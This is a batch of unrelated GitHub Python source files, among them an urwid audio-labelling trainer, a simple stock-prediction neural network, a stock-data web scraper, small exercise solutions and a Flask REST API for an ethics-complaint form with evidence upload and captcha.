urwid.Divider(),\n urwid.LineBox(self.status),\n urwid.Divider(),\n self.progress_wrap,\n urwid.Divider(),\n self.button(\"Save and quit\", self.save_and_exit_program),\n self.button(\"Quit without saving\", self.exit_program),\n ]\n w = urwid.ListBox(urwid.SimpleListWalker(l))\n return w\n\n def main_window(self):\n self.graph = self.bar_graph()\n self.graph_wrap = urwid.WidgetWrap(self.graph)\n vline = urwid.AttrWrap(urwid.SolidFill('\\u2502'), 'line')\n c = self.graph_controls()\n w = urwid.Columns([('weight', 1, self.graph_wrap),\n ('fixed', 1, vline), (42, c)],\n dividechars=1, focus_column=2)\n w = urwid.Padding(w, ('fixed left', 1), ('fixed right', 1))\n w = urwid.AttrWrap(w,'body')\n w = urwid.LineBox(w)\n w = urwid.AttrWrap(w,'line')\n w = self.main_shadow(w)\n return w\n\n\nclass TrainerDisplay(object):\n\n def __init__(self, ns):\n self.ns = ns\n self.model = TrainerModel(ns.input, window_length=ns.window_length, \n threshold=ns.noise_threshold, n_mfcc=ns.n_mfcc)\n self.view = TrainerView(self)\n 
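# draw the first segment immediately so the interface starts populated\n        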
self.view.update_segment()\n\n def select_category(self, cat):\n s = self.model.current_segment \n self.model.categories[s] = cat\n self.select_segment(s+1)\n\n def select_segment(self, s):\n if s < 0:\n s = 0\n elif s >= self.model.nsegments:\n s = self.model.nsegments - 1\n self.model.current_segment = s\n clip = self.model.clip\n self.view.update_segment()\n self.loop.set_alarm_in(0.001, lambda w, d: sound.play(clip, self.model.sr))\n\n def offset_current_segment(self, offset):\n s = self.model.current_segment\n s += offset\n self.select_segment(s)\n\n def save(self):\n model = self.model\n view = self.view\n view.status.set_text('\\nComputing MFCCs\\n')\n model.compute_mfccs(view.progress.set_completion)\n view.status.set_text('\\nComputing distance matrix\\n')\n model.compute_distances(self.ns.output, view.progress.set_completion)\n view.status.set_text('\\nSaving\\n')\n model.save(self.ns.output)\n\n def main(self):\n self.loop = urwid.MainLoop(self.view, self.view.palette, pop_ups=True)\n self.loop.set_alarm_in(0.001, lambda w, d: self.select_segment(0))\n self.loop.run()\n\n\ndef add_arguments(parser):\n cli.add_output(parser)\n cli.add_window_length(parser)\n cli.add_noise_threshold(parser)\n cli.add_n_mfcc(parser)\n cli.add_input(parser)\n\n\ndef main(ns=None, args=None):\n \"\"\"Entry point for umdone trainer.\"\"\"\n if ns is None:\n parser = ArgumentParser('umdone-trainer')\n add_arguments(parser)\n ns = parser.parse_args(args)\n if ns.output is None:\n ns.output = '{0}-umdone-training.h5'.format(os.path.splitext(ns.input)[0])\n TrainerDisplay(ns).main()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"111t8e/umdone","sub_path":"umdone/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":10816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13277609579","text":"import numpy as np\nimport scipy.special as ss\n\n# neural network class definition\nclass StockBot:\n\n # initialise the neural network\n def __init__(self, hiddennodes, nhiddenlayers, nhiddenoutputs, learningrate):\n # set number of nodes in each input, hidden, and output layer\n self.inodes = 5 + nhiddenoutputs\n self.hnodes = hiddennodes\n self.onodes = 5 + nhiddenoutputs\n\n # number of hidden layers & hidden in/outputs\n self.nhlayers = nhiddenlayers\n self.nhout = nhiddenoutputs\n\n # initial weight matricies\n self.wih = np.random.normal(0.0, pow(self.hnodes, -0.5), (self.hnodes, self.inodes))\n self.whh = [np.random.normal(0.0, pow(self.hnodes, -0.5), (self.hnodes, self.hnodes)) for i in range(self.nhlayers - 1)]\n self.who = np.random.normal(0.0, pow(self.onodes, -0.5), (self.onodes, self.hnodes))\n self.wm = [self.wih] + self.whh + [self.who]\n\n # learning rate\n self.lr = learningrate\n \n # activation function is the sigmoid function\n self.activation_function = lambda x: ss.expit(x)\n\n pass\n\n # train the neural network\n def train(self, inputs_list):\n for train_cycle in range(10):\n\n next_hinputs = [0 for i in range(self.nhout)]\n for dat in range(200): #len(inputs_list) - 2\n # Cycles through two inputs in the time series, using backprop into the prior time element\n two_cycle_outputs = []\n two_cycle_targets = [] \n\n for two_cycle in range(2):\n # append 0 * the number of hidden inputs to the input list, next_hinputs changes depending on time-step\n inputs = np.array(np.append(inputs_list[dat + two_cycle], next_hinputs), ndmin = 2).T\n # output list for all layers to be used in backprop\n output_list = 
[inputs]\n # target for current time-step\n targets = np.array(inputs_list[dat + two_cycle + 1], ndmin = 2)\n # stores the targets for both time-steps considered\n two_cycle_targets.insert(0, targets)\n \n # calculates the first inputs for the first hidden layer\n hidden_inputs = np.dot(self.wih, inputs)\n hidden_outputs = np.array(self.activation_function(hidden_inputs), ndmin = 2)\n output_list.append(hidden_outputs)\n \n # loops through each layer, calculating the outputs for each and storing them\n current_layer = 1\n while current_layer < len(self.wm):\n # calculates the inputs for the next layer, then the outputs through the activation function\n hidden_inputs = np.dot(self.wm[current_layer], output_list[current_layer])\n hidden_outputs = self.activation_function(hidden_inputs)\n print(hidden_outputs)\n\n # appends the new outputs to the output list to be used for the next layer calculation\n output_list.append(np.array(hidden_outputs, ndmin = 2))\n # increments the layer pointer\n current_layer += 1\n\n # the whole output list is appended to a more global storage to be used in backprop later\n two_cycle_outputs.insert(0, output_list)\n\n # the hidden outputs from the first time step are fed into the hidden inputs for the second\n if two_cycle == 0: \n next_hinputs = output_list[-1][-self.nhout :]\n continue \n\n \n\n # Multi-timestep backprop\n for two_cycle in range(2):\n if two_cycle == 0:\n # second step final output\n final_output = two_cycle_outputs[two_cycle][-1]\n # targets, is second step targets and final outputs of the hidden variables, so error is 0 for these \n targets = np.array(np.append(two_cycle_targets[two_cycle], final_output[-self.nhout :]), ndmin = 2)\n output_errors = targets.T - final_output\n follow_through_errors = output_errors[ : ] \n\n else:\n # output errors for first step come from the prior step\n output_errors = np.array(np.append(follow_through_errors[: 5], current_errors[-self.nhout :]), ndmin = 2).T\n \n # current errors variable to make the method more clear\n current_errors = output_errors\n current_layer = 1\n while current_layer < (len(self.wm) + 1):\n\n # current & previous outputs used in updating the weights matricies\n current_outputs = two_cycle_outputs[two_cycle][-current_layer]\n # calculate the hidden errors\n hidden_errors = np.dot(self.wm[-current_layer].T, current_errors)\n\n prev_outputs = two_cycle_outputs[two_cycle][-(current_layer + 1)]\n # updating the current weight matrix\n if two_cycle == 1:\n self.wm[-current_layer] += self.lr * np.dot((current_errors * current_outputs * (1.0 - current_outputs)),\n np.transpose(prev_outputs))\n\n # current errors on the next loop are the current hidden errors\n current_errors = hidden_errors\n # increment the current_layer pointer\n current_layer += 1\n \n pass\n\n \n # predict the neural network\n def predict(self, inputs_list, stepsbehind, stepsahead):\n # list of predictions made given parameters\n predictions = []\n # only making predictions with stepsbehind steps, but also need steps ahead true values for comparisons\n inputs_list = inputs_list[-(stepsbehind + stepsahead): ]\n\n next_hinputs = [0 for i in range(self.nhout)]\n for dat in range(stepsbehind + stepsahead): \n \n # inputs will be previous outputs if dat has parsed through all steps behind\n if dat < stepsbehind:\n # append 0 * the number of hidden inputs to the input list, next_hinputs changes depending on time-step\n inputs = np.array(np.append(inputs_list[dat], next_hinputs), ndmin = 2).T\n else:\n inputs = 
np.array(next_hinputs, ndmin = 2).T\n            print(inputs)\n\n            # output list for all layers to be used in backprop\n            output_list = [inputs]\n\n            # calculates the first inputs for the first hidden layer\n            hidden_inputs = np.dot(self.wih, inputs)\n            hidden_outputs = np.array(self.activation_function(hidden_inputs), ndmin = 2)\n            output_list.append(hidden_outputs)\n            \n            # loops through each layer, calculating the outputs for each and storing them\n            current_layer = 1\n            while current_layer < len(self.wm):\n                # calculates the inputs for the next layer, then the outputs through the activation function\n                hidden_inputs = np.dot(self.wm[current_layer], output_list[current_layer])\n                hidden_outputs = self.activation_function(hidden_inputs)\n\n                # appends the new outputs to the output list to be used for the next layer calculation\n                output_list.append(np.array(hidden_outputs, ndmin = 2))\n                # increments the layer pointer\n                current_layer += 1\n\n            if dat < stepsbehind - 1:\n                # the hidden outputs from the first time step are fed into the hidden inputs for the second\n                next_hinputs = output_list[-1][-self.nhout :]\n            else:\n                # all outputs are fed back through to make predictions\n                next_hinputs = output_list[-1]\n                print(hidden_outputs)\n            predictions.append(next_hinputs[: -self.nhout])\n        \n        return np.array(predictions)\n\n\n\n\n\n\n","repo_name":"Veileihi/Stock_Bot","sub_path":"neural_stock_bot.py","file_name":"neural_stock_bot.py","file_ext":"py","file_size_in_byte":8523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"4165901706","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\n# Getting data from file\ndata=np.genfromtxt(r'Salary_Data.csv', delimiter=',')\ndata=np.delete(data,0,axis=0)\n# print (data)\nX=data[:,0]\n# print(np.size(X))\ny=data[:,1]\nX=X.reshape(-1,1)\n# print(X)\n\n# applying linear regression\nlinReg=LinearRegression()\nlinReg.fit(X,y)\npre=linReg.predict(X)\n\n# plotting data\nplt.scatter(X,y,c=\"red\")\nplt.plot(X,pre,scalex=True,scaley=True, color='blue')\nplt.xlabel(\"Years of Experience\")\nplt.ylabel(\"Salary\")\nplt.title(\"Linear Regression Model for Salary\")\nplt.show()","repo_name":"opencodeiiita/INTEL-20","sub_path":"TASK-1/Question-1/aawizard.py","file_name":"aawizard.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"811302171","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nx=int(input())\nfor w in range(x):\n    y=int(input())\n    a=[]\n    for i in range(y):\n        a.append(input().split(\" \"))\n    b=[]\n    for i in range(0,len(a[0])):\n        p=[]\n        for j in a:\n            p.append(j[i])\n        b.append(p)\n    c=0\n    for i in range(0,len(a)):\n        for j in range(0,len(a[i])):\n            if(i==j):\n                c=c+int(a[i][j])\n    k=0\n    for i in a:\n        if(len(i)!=len(set(i))):\n            k=k+1\n    l=0\n    for i in b:\n        if(len(i)!=len(set(i))):\n            l=l+1\n    print(\"Case #\"+str(w+1)+\":\",c,k,l)\n\n","repo_name":"Vedant-S/Codes-VS","sub_path":"Codes/Competitive Programming/Vestigium.py","file_name":"Vestigium.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"31318764394","text":"import re\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\n\n'''\nFirst scrape the stock codes from Eastmoney, then use each code to scrape the stock details from Baidu Gupiao\n'''\nclass Spider(object):\n    def __init__(self):\n        
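# browser-like request headers make the scraper less likely to be rejected by the site\n        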
self.headers = {\n            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n            'Accept-Encoding': 'gzip, deflate, br',\n            'Accept-Language': 'zh-CN,zh;q=0.9',\n            'Upgrade-Insecure-Requests': '1',\n            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',\n        }\n\n    # shared page-fetching helper\n    def getPage(self, url):\n        try:\n            r = requests.get(url=url, headers=self.headers)\n            # check whether the page returned correctly\n            # HttpError -> https://www.jianshu.com/p/159bea26f7b5\n            r.raise_for_status()\n            # use the source site's encoding\n            r.encoding = r.apparent_encoding\n            # return a BeautifulSoup object\n            return BeautifulSoup(r.text, 'html.parser')\n        except:\n            print('HTTPError: connection error')\n            return None\n\n    # stock codes from Eastmoney\n    def eastMoney(self):\n        url = 'http://quote.eastmoney.com/stocklist.html'\n        html_data = self.getPage(url)\n        if html_data is None:\n            return []\n        # container that holds the stock codes\n        quotesearch = html_data.find_all('div', id='quotesearch')\n        # print(quotesearch)\n        # extract the codes\n        a_list = []\n        a_item = map(lambda x: x.find_all('a'), quotesearch)\n        for i in list(a_item)[0]:\n            # print(i.attrs['href'])\n            try:\n                if i.attrs['href'] is not None:\n                    href = i.attrs['href']\n                    # print(href)\n                    a_list.append(re.findall(r'[s][hz]\\d{6}', href)[0])\n            except:\n                # print('failed to extract a code')\n                # skip entries that do not match\n                continue\n        return a_list\n    # fetch the stock details from Baidu Gupiao for each scraped stock code\n    def getStockDetails(self, stock_list):\n    # def getStockDetails(self):\n        '''url = 'https://gupiao.baidu.com/stock/sh000001.html'\n        html_data = self.getPage(url)\n        \n        stock_bets = html_data.find('div', attrs={'class': 'stock-bets'})\n        name = stock_bets.find('a', attrs={'class': 'bets-name'})\n        stock_data = {}\n        stock_data.update({'名称': name.text.strip()})\n        stock_data['list'] = []\n        # parameter items\n        bets_content_col = stock_bets.find('div', attrs={'class': 'bets-col-9'})\n        for i in bets_content_col.find_all('dl'):\n            _list = {}\n            _list['name'] = i.find('dt').text\n            _list['value'] = i.find('dd').text\n            stock_data['list'].append(_list)\n        print(stock_data)'''\n\n        \n        url = 'https://gupiao.baidu.com/stock/{}.html'\n        stock_data = {}\n        stock_data['list'] = []\n        for i in stock_list:\n            html_data = self.getPage(url.format(i))\n            # error tolerance\n            try:\n                if html_data is None:\n                    continue\n                # find\n                stock_bets = html_data.find('div', attrs={'class': 'stock-bets'})\n                name = stock_bets.find('a', attrs={'class': 'bets-name'})\n                # add\n                stock_data.update({'名称': name.text.strip()})\n                # parameter items\n                bets_content_col = stock_bets.find('div', attrs={'class': 'bets-content'})\n                for i in bets_content_col.find_all('dl'):\n                    _list = {}\n                    _list['name'] = i.find('dt').text\n                    _list['value'] = i.find('dd').text\n                    stock_data['list'].append(_list)\n                with open('Stock.txt', 'a', encoding='utf-8') as f:\n                    # keep non-ASCII output (otherwise the Chinese text would be converted to ASCII escapes)\n                    f.write(json.dumps(stock_data, ensure_ascii=False) + '\\n')\n            except:\n                print('something went wrong')\n                continue\n        # print(stock_data)\n\n    \n    # main routine\n    def main(self):\n        # self.eastMoney()\n        self.getStockDetails(self.eastMoney()[100: 102])\n        # self.getStockDetails()\n\nif __name__ == '__main__':\n    main = Spider().main()\n","repo_name":"ToWorkit/Python_Reptile","sub_path":"new/股票/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"74668738360","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef ThreeSquares(x):\n    abc = []\n    x_ = []\n    y_ = []\n    z_ = []\n    degen = 0\n    a = 0\n    while a ** 2 <= x:\n        b = a\n        while b ** 2 <= x:\n            c = b\n            while c ** 2 <= x:\n                if a ** 2 + b ** 2 + c ** 2 == x:\n
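                    # record the (a, b, c) triple so the returned abc actually holds the decompositions\n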
                    abc.append((a, b, c))\n\n                    x_.append(a)\n                    x_.append(b)\n                    x_.append(c)\n                    y_.append(degen)\n                    y_.append(degen)\n                    y_.append(degen)\n                    z_.append(1)\n                    z_.append(2)\n                    z_.append(3)\n\n                    degen = degen + 1\n\n                c = c + 1\n            b = b + 1\n        a = a + 1\n    if degen == 0:\n        # return empty lists so the caller can still unpack five values\n        return [], 0, [], [], []\n    else:\n        return abc, degen, x_, y_, z_\n\n\n# ----------- #\nn = 9998\n# ----------- #\n\nfig = plt.figure()\n# create a 3D axes\nax = fig.add_subplot(projection='3d')\n\nax.set_xlabel('Value')\nax.set_ylabel('Degeneracy')\nax.set_zlabel('ABC')\n\ncombos, d, x, y, z = ThreeSquares(n)\nxs = np.asarray(x)\nys = np.asarray(y)\nzs = np.asarray(z)\ni = 0\nfor i in range(d):\n    a = i * 3\n    new_x = [xs[a], xs[a+1], xs[a+2]]\n    new_y = [ys[a], ys[a+1], ys[a+2]]\n    new_z = [zs[a], zs[a+1], zs[a+2]]\n    ax.plot(new_x, new_y, new_z)\n\nprint(d)\n\nplt.show()\n","repo_name":"benedictsaunders/ThreeSquares","sub_path":"Python/degeneracy_plotter.py","file_name":"degeneracy_plotter.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"33897589320","text":"import serial\nser = serial.Serial(\"/dev/ttyUSB0\", 9600)\n\nwhile True:\n    # when the Arduino sends an entire string i.e. Serial.println(\"Hello, World!\")\n    # Python is able to read the entire string\n    print(ser.readline().strip())\n\n# when sending multiple characters\n# Arduino will parse all of the above\nser.write('0123')\n\n# i.e.\n# if (Serial.available()) {\n#     int value = (int)(Serial.read()-'0');\n#     strip.setPixelColor(value,255,0,0);\n#     strip.show();\n# }\n#\n# will show all 4 pixels\n","repo_name":"gabrielwong159/rpi","sub_path":"arduino/arduino_serial.py","file_name":"arduino_serial.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"}
+{"seq_id":"7231008749","text":"def inputAccount():\n    valid_input = False\n    while not valid_input:\n        account = input(\"Select which account should be used\\n\\n1 - tim.wigton@wigtonco.com\\n2 - tim@murcadom.com\\n\\n\")\n        if int(account) == 1:\n            account = \"tim.wigton@wigtonco.com\"\n            valid_input = True\n        elif int(account) == 2:\n            account = \"tim@murcadom.com\"\n            valid_input = True\n        else:\n            print(\"invalid input\")\n    return account\n","repo_name":"wignition/labelChanger","sub_path":"inputAccount.py","file_name":"inputAccount.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"73886537721","text":"import sys\n\n\ndef rl():\n    return sys.stdin.readline().strip()\n\n\ndef rn():\n    return list(map(int, sys.stdin.readline().strip().split()))\n\n\ndef rln(n):\n    l = [None] * n\n    for i in range(n):\n        l[i] = int(rl())\n    return l\n\n\nif __name__ == '__main__':\n\n    t = int(input())\n    for _ in range(t):\n        deg = list(map(int, input().split()))[1::]\n        d = int(input())\n        k = int(input())\n\n        pos = 1\n        n = 1\n        while pos < k:\n            pos += n * d\n            if pos > k:\n                break\n            n += 1\n\n        res = 0\n        for i in range(len(deg)):\n            res += (n ** i) * deg[i]\n\n        print(res)\n\n","repo_name":"jaxalo/UVA","sub_path":"Problem Solving Pardigms/Complete Search/Linear scan/UVA927_Integer_Sequence.py","file_name":"UVA927_Integer_Sequence.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"34182963500","text":"import codecs\n\nfrom flask_restplus import Resource\nfrom flask import request, send_file, send_from_directory\n# importing initial settings\nimport 
flask_app.settings.LogDefaultConfig\nfrom flask_app.dto.mongo_class.Captcha import Captcha\nfrom flask_app.dto.mongo_class.ConfiguracionGeneral import ConfiguracionMail\nfrom flask_app.dto.mongo_class.Form import Formulario\nfrom flask_app.my_lib.utils import fill_information_usuario, get_files_for, set_max_age_to_response, \\\n    fill_timeline_notification\nfrom flask_app.settings import initial_settings as init\nfrom flask_app.api.services.restplus_config import api\nfrom flask_app.api.services.restplus_config import default_error_handler\nfrom flask_app.api.services.Formulario import parsers, serializers as srl\n# importing the classes that read from MongoDB\nfrom flask_app.dto.mongo_class.FormTemporal import *\nfrom flask_app.my_lib.send_mail.send_mail import *\nfrom flask_app.my_lib.captcha.captcha_util import *\n# configuring the logger and the web service\nlog = flask_app.settings.LogDefaultConfig.LogDefaultConfig(\"ws_denuncias.log\").logger\nns = api.namespace('formularios', description='Endpoints for managing the procedures of the CENACE Ethics Committee')\n\n\nser_from = srl.FormSerializers(api)\napi = ser_from.add_serializers()\n\n\n@ns.route('/forma/<string:id_forma>')\nclass FormularioAPI(Resource):\n\n    def get(self, id_forma: str = \"Id of the form to look up\"):\n        \"\"\" Looks up a definitive form, i.e. one already accepted via email \"\"\"\n        forma = Formulario.objects(id_forma=id_forma).first()\n        if forma is None:\n            return dict(success=False, forma=None, msg=\"Información no encontrada\"), 404\n        files = get_files_for(id_forma)\n        return dict(success=True, forma=forma.to_dict(), files=files, msg=\"Información cargada\"), 200\n\n    @api.expect(ser_from.forma)\n    def put(self, id_forma: str = \"Id of the form to look up\"):\n        \"\"\" Edits the data of a temporary form \"\"\"\n        request_data = dict(request.json)\n        forma = FormularioTemporal.objects(id_forma=id_forma).first()\n        if forma is None:\n            return dict(success=False, forma=None, msg=\"No se ha encontrado información asociada\"), 404\n        forma.update_data(request_data)\n        forma.save()\n        return dict(success=True, forma=forma.to_dict(), msg=\"Información actualizada\"), 200\n\n\n@ns.route('/forma-temporal/<string:id_forma>')\nclass FormularioTemporalAPI(Resource):\n\n    def get(self, id_forma: str = \"Id of the form to look up\"):\n        \"\"\" Looks up a temporary form submitted through the web form \"\"\"\n        forma = FormularioTemporal.objects(id_forma=id_forma).first()\n        if forma is None:\n            return dict(success=False, forma=None, msg=\"Información no encontrada\"), 404\n        files = get_files_for(id_forma)\n        return dict(success=True, forma=forma.to_dict(), files=files, msg=\"Información cargada\"), 200\n\n\n@ns.route('/usuario/<string:ci>')\nclass FormularioUsuarioAPI(Resource):\n\n    def get(self, ci: str = \"Complainant's ID number\"):\n        \"\"\" Finds the existing complaints for the user with this CI \"\"\"\n        # forma = SRNode.objects(nombre=nombre).first()\n        query = {'data.ci': ci}\n        forma = FormularioTemporal.objects(__raw__=query).first()\n        if forma is None:\n            return dict(success=False), 404\n        return forma.to_dict(), 200\n\n\n@ns.route('/forma')\nclass FormularioPostAPI(Resource):\n    @api.expect(ser_from.forma)\n    def post(self):\n        \"\"\" Posts a form to the server \"\"\"\n        request_data = dict(request.json)\n        id_forma = request_data.get(\"id_forma\", None)\n        temp_form = FormularioTemporal.objects(id_forma=id_forma).first()\n        if temp_form is not None:\n            return dict(success=False, forma=None, msg=\"Esta forma ya existe\"), 304\n        request_data.pop(\"id_forma\", None)\n        
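# new submissions are held as FormularioTemporal; a form becomes a Formulario once accepted via email\n        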
forma = FormularioTemporal(data=DataForm(**request_data))\n        forma.save()\n        return dict(success=True, forma=forma.to_dict(), msg=\"Forma registrada de manera correcta\"), 200\n\n\n@ns.route('/forma-temporal/<string:id_forma>/evidencias')\nclass EvidenciasAPI(Resource):\n    @api.response(200, 'File uploaded successfully')\n    @api.expect(parsers.file_upload)\n    def post(self, id_forma):\n        \"\"\" Uploads evidence files to the form (id_forma) \"\"\"\n        args = parsers.file_upload.parse_args()\n        filename = args['file'].filename\n        stream_file = args['file'].stream.read()\n        # make sure the destination folder exists\n        destination = os.path.join(init.FILE_REPO, id_forma)\n        if not os.path.exists(destination):\n            try:\n                os.makedirs(destination)\n            except:\n                log.info(f\"This file already exists {destination}\")\n        # path of the file to save\n        file_path = os.path.join(destination, filename)\n        if os.path.exists(file_path):\n            os.remove(file_path)\n        with open(file_path, 'wb') as f:\n            f.write(stream_file)\n        return dict(success=True, msg=f\" {filename} - This file was uploaded\"), 200\n\n\n@ns.route('/forma/<string:id_forma>/evidencias/<string:file>')\nclass EvidenciasFileAPI(Resource):\n\n    def get(self, id_forma, file):\n        \"\"\" Retrieves a file uploaded to the case file \"\"\"\n        form_path = os.path.join(init.FILE_REPO, id_forma)\n        file_path = os.path.join(form_path, file)\n        if not os.path.exists(file_path):\n            return dict(success=False, msg=\"Archivo no encontrado\"), 404\n        response = send_from_directory(os.path.dirname(file_path), file, as_attachment=True)\n        return set_max_age_to_response(response, 30)\n\n    def delete(self, id_forma, file):\n        \"\"\" Deletes a file uploaded to the case file \"\"\"\n        form_path = os.path.join(init.FILE_REPO, id_forma)\n        file_path = os.path.join(form_path, file)\n        if not os.path.exists(file_path) or not os.path.isfile(file_path):\n            return dict(success=False, msg=\"Archivo no encontrado\"), 404\n        os.remove(file_path)\n        files = get_files_for(id_forma)\n        return dict(success=True, files=files, msg=\"Archivo eliminado\"), 200\n\n\n@ns.route('/captcha/<string:id>')\nclass CaptchaAPI(Resource):\n    def post(self, id):\n        \"\"\" Creates a new captcha \"\"\"\n        text, image = gen_captcha(6)\n        captcha = Captcha(id_captcha=id, text=text)\n        captcha.save()\n        return send_file(image, as_attachment=False,\n                         attachment_filename=f'{id}.png',\n                         mimetype='image/png')\n\n\n@ns.route('/captcha/<string:id>/<string:value>/verified')\nclass VerifiedCaptchaAPI(Resource):\n    def get(self, id, value):\n        \"\"\" Checks whether the submitted code matches the generated captcha \"\"\"\n        captcha = Captcha.objects(id_captcha=id).first()\n        if captcha is None:\n            return dict(success=False, errors=\"No se encontró el captcha en referencia\"), 400\n        if captcha.text == value:\n            return dict(success=True), 200\n        else:\n            return dict(success=False), 200\n\n\n@ns.route('/evidencia')\nclass EvidenciaAPI(Resource):\n    @api.response(200, 'File uploaded successfully')\n    @api.expect(parsers.file_upload)\n    def post(self):\n        \"\"\" Adds evidence files to the temporary folder \"\"\"\n        args = parsers.file_upload.parse_args()\n        filename = args['file'].filename\n        stream_file = args['file'].stream.read()\n        # make sure the destination folder exists\n        destination = os.path.join(init.FILE_REPO, \"temp\")\n        if not os.path.exists(destination):\n            os.makedirs(destination)\n        # path of the file to save\n        destination = os.path.join(destination, filename)\n        with open(destination, 'wb') as f:\n            f.write(stream_file)\n        return dict(success=True), 200\n\n\n@ns.route('/mail-temporal/<string:id_forma>')\nclass mailAPI(Resource):\n    def post(self, id_forma):\n        \"\"\" Sends a notification email built from the form's data \"\"\"\n        
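# load the HTML notification template, fill it with the submission details, and mail it to the address on the form\n        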
temp_form = FormularioTemporal.objects(id_forma=id_forma).first()\n        if temp_form is None:\n            return dict(success=False, msg=\"Los datos no han sido ingresados en el Sistema\")\n        # read template for notifications:\n        html_template_path = os.path.join(init.TEMPLATE_REPO, \"Notification.html\")\n        html_str = codecs.open(html_template_path, 'r', 'utf-8').read()\n        # filling in the information:\n        html_str = fill_information_usuario(html_str, temp_form, get_files_for(id_forma))\n        mail = temp_form.data[\"correo_electronico\"]\n        success, msg = send_mail(html_str, \"Notificación CENACE CE\", [mail], init.from_email)\n        return dict(success=success, msg=msg), 200 if success else 409\n\n\n@ns.route('')\nclass FormsAPI(Resource):\n    def get(self):\n        \"\"\" Returns every procedure submitted to the platform \"\"\"\n        result = list()\n        for form in Formulario.objects:\n            result.append(form.to_dict())\n        return dict(success=True, forms=result, msg=\"Lista de trámites\"), 200\n","repo_name":"Borreguin/API-CE","sub_path":"flask_app/api/services/Formulario/endpoints/api_form.py","file_name":"api_form.py","file_ext":"py","file_size_in_byte":9058,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"15672629558","text":"# gen some random data for testing\nimport sqlite3\nimport orjson\nimport random\nimport string\nimport time\n\n\nDATA_SIZE = 1_000_000\n\nletter_len = len(string.ascii_letters)\n\ndef random_string():\n    start = random.randint(0, letter_len)\n    end = random.randint(start, letter_len)\n    return string.ascii_letters[start:end]\n\n\n\"\"\"\ntest data:\n    {\n        id(int): {\n            name: str\n            category: 1|2|3\n        },\n        ...\n    }\n\"\"\"\n\n\ntest_data = {}\n\nfor id in range(DATA_SIZE):\n    test_data[str(id)] = {\"name\": random_string(), \"category\": random.randint(1,3)}\n\n\ndef get_time(func, *args, **kwargs):\n    start = time.perf_counter()\n    func(*args, **kwargs)\n    end = time.perf_counter()\n    print(f\"{func.__name__}: {end - start}\")\n\n# orjson is really fast\n# get_time(str, test_data)\n# get_time(orjson.dumps, test_data)\n\nwith open(\"test_data.json\", \"wb+\") as fp:\n    fp.write(orjson.dumps(test_data))\n\nconnection = sqlite3.connect(\"test_data.db\")\ncursor = connection.cursor()\ncursor.execute(\"\"\"\nCREATE TABLE IF NOT EXISTS \"data\" (\n    \"id\" INTEGER UNIQUE,\n    \"name\" TEXT,\n    \"category\" INTEGER,\n    PRIMARY KEY(\"id\")\n);\n\"\"\")\nfor id in test_data:\n    name, category = test_data[id].values()\n    cursor.execute(\n        \"INSERT INTO data (id, name, category) VALUES (?, ?, ?);\", \n        (id, name, category),\n    )\n\nconnection.commit()\n","repo_name":"StarrFox/code","sub_path":"python/json_vs_sqlite/datagen.py","file_name":"datagen.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"2453458549","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nfrom apiclient import discovery\r\nfrom oauth2client import client\r\nfrom oauth2client import tools\r\nfrom oauth2client.file import Storage\r\n\r\nfrom argparse import ArgumentParser, ArgumentDefaultsHelpFormatter, Namespace\r\nfrom argparse import SUPPRESS as AP_SUPPRESS\r\ntry:\r\n    import argparse\r\n    flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\r\nexcept ImportError:\r\n    flags = None\r\n\r\nimport csv\r\nimport datetime\r\nimport httplib2\r\nimport logging\r\nimport os\r\nimport sys\r\n\r\nscript_name = 
